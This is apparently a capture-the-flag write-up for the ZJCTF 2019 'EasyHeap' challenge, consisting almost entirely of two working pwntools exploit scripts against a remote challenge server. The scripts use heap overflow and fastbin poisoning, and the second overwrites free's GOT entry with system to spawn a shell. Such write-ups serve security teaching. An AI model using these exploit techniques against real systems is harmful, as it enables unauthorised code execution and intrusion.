[ZJCTF 2019]EasyHeap

    Technology  2023-08-31  109

    The addresses below are hard-coded because this challenge was built without PIE, so they never change… The figure below shows the constructed chunk used to write the magic variable. exp:

    from pwn import *

    context.log_level = 'debug'

    def pause_debug():
        log.info(proc.pidof(p))
        pause()

    def create(size, content):
        p.sendlineafter('choice :', str(1))
        p.sendlineafter('Heap :', str(size))
        p.sendafter('heap:', content)

    def edit(idx, size, content):
        p.sendlineafter('choice :', str(2))
        p.sendlineafter('Index :', str(idx))
        p.sendlineafter('Heap :', str(size))
        p.sendafter('heap :', content)

    def delete(idx):
        p.sendlineafter('choice :', str(3))
        p.sendlineafter('Index :', str(idx))

    proc_name = './easyheap'
    # p = process(proc_name)
    p = remote('node3.buuoj.cn', 29006)
    elf = ELF(proc_name)

    create(0x18, b'a')  # 0
    create(0x68, b'a')  # 1
    create(0x68, b'a')  # 2
    create(0x18, b'a')  # 3
    # overflow from chunk 0 rewrites chunk 1's size field to 0xe1, so it now spans chunk 2
    edit(0, 0x20, b'a' * 0x18 + p64(0xe1))
    delete(1)
    create(0x68, b'a')  # 1
    create(0x68, b'a')  # 4, overlaps chunk 2
    delete(4)
    # chunk 2 aliases the freed chunk 4: set its fastbin fd to the fake chunk next to magic
    edit(2, 0x8, p64(0x6020ad))
    create(0x68, b'b' * 0x8)
    # the fake chunk is handed back; 3 bytes of padding, then magic = 0x1306
    create(0x68, b'a' * 0x3 + p32(0x1306))
    p.sendlineafter('choice :', str(0x1305))
    p.interactive()

    The above works locally but not against the remote; the remote environment is probably deployed a bit differently…

    A different approach: since the array that stores the malloc'd pointers is also nearby, one of those pointers can be made to point at free's GOT entry. Changing free's GOT slot to system and also writing /bin/sh means that free(1) becomes system(/bin/sh), which gives a shell…

    from pwn import *

    context.log_level = 'debug'

    def pause_debug():
        log.info(proc.pidof(p))
        pause()

    def create(size, content):
        p.sendlineafter('choice :', str(1))
        p.sendlineafter('Heap :', str(size))
        p.sendafter('heap:', content)

    def edit(idx, size, content):
        p.sendlineafter('choice :', str(2))
        p.sendlineafter('Index :', str(idx))
        p.sendlineafter('Heap :', str(size))
        p.sendafter('heap :', content)

    def delete(idx):
        p.sendlineafter('choice :', str(3))
        p.sendlineafter('Index :', str(idx))

    proc_name = './easyheap'
    # p = process(proc_name)
    p = remote('node3.buuoj.cn', 25727)
    elf = ELF(proc_name)

    create(0x68, b'a')  # 0
    create(0x68, b'a')  # 1
    create(0x68, b'a')  # 2
    delete(2)
    # overflow from chunk 1: place /bin/sh in chunk 1, keep chunk 2's size 0x71,
    # and set its fastbin fd to the fake chunk at 0x6020ad
    edit(1, 0x78, b'/bin/sh'.ljust(0x68, b'\x00') + p64(0x71) + p64(0x6020ad))
    create(0x68, b'b')  # 2
    create(0x68, b'b')  # 3, the fake chunk
    # from the fake chunk, overwrite pointer slot 0 with the address of free@got
    edit(3, 0x2b, b'a' * 0x23 + p64(elf.got['free']))
    # editing index 0 now writes system@plt into free's GOT entry
    edit(0, 0x8, p64(elf.plt['system']))
    # free(heaparray[1]) -> system("/bin/sh")
    delete(1)
    p.interactive()

    Clearly the flag is in the root directory, while the challenge says it is at /home/pwn/flag, so the first method cannot reach it…
